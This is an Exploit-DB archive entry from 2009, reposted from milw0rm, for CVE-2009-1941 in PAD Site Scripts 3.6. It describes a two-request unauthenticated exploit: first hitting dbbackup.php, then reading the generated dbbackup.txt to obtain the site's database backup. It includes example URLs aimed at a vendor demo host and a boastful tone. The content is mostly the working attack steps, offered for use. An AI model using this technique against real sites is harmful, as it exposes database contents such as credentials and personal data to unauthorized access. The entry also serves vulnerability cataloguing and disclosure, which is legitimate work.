PAD Site Scripts 3.6 - Remote Arbitrary Database Backup Vulnerability

2009-06-01T00:00:00
ID EDB-ID:8850
Type exploitdb
Reporter TiGeR-Dz
Modified 2009-06-01T00:00:00

Description

PAD Site Scripts 3.6 Remote Arbitrary Database Backup Vulnerability. CVE-2009-1941. Webapps exploit for php platform

                                        
                                            ---------------------------------------------------------------
---------------------------------------------------------------
PAD Site Scripts v3.6 Bypass DB Backup Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.pad-site-scripts.com
Script:PAD Site Scripts v3.6
Download:http://www.pad-site-scripts.com/demo.php
Thank you my best Friends The g0bL!N and Hisok4
---------------------------------------------------------------
Exploit
-------
www.site.com/[path]/dbbackup.php
Note: We can not download Backup Because This site is required name admin and password for download Backup
and We will read Backup Without Download
Go to www.site.com/dbbackup.txt

And booooooooooom The backup is reading :)
----------------------------------------------------------------
Dem0
----
http://demo.pad-site-scripts.com/sysop/dbbackup.php
Go to
http://demo.pad-site-scripts.com/dbbackup.txt

And booooooooooom The backup is reading :)
--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# milw0rm.com [2009-06-01]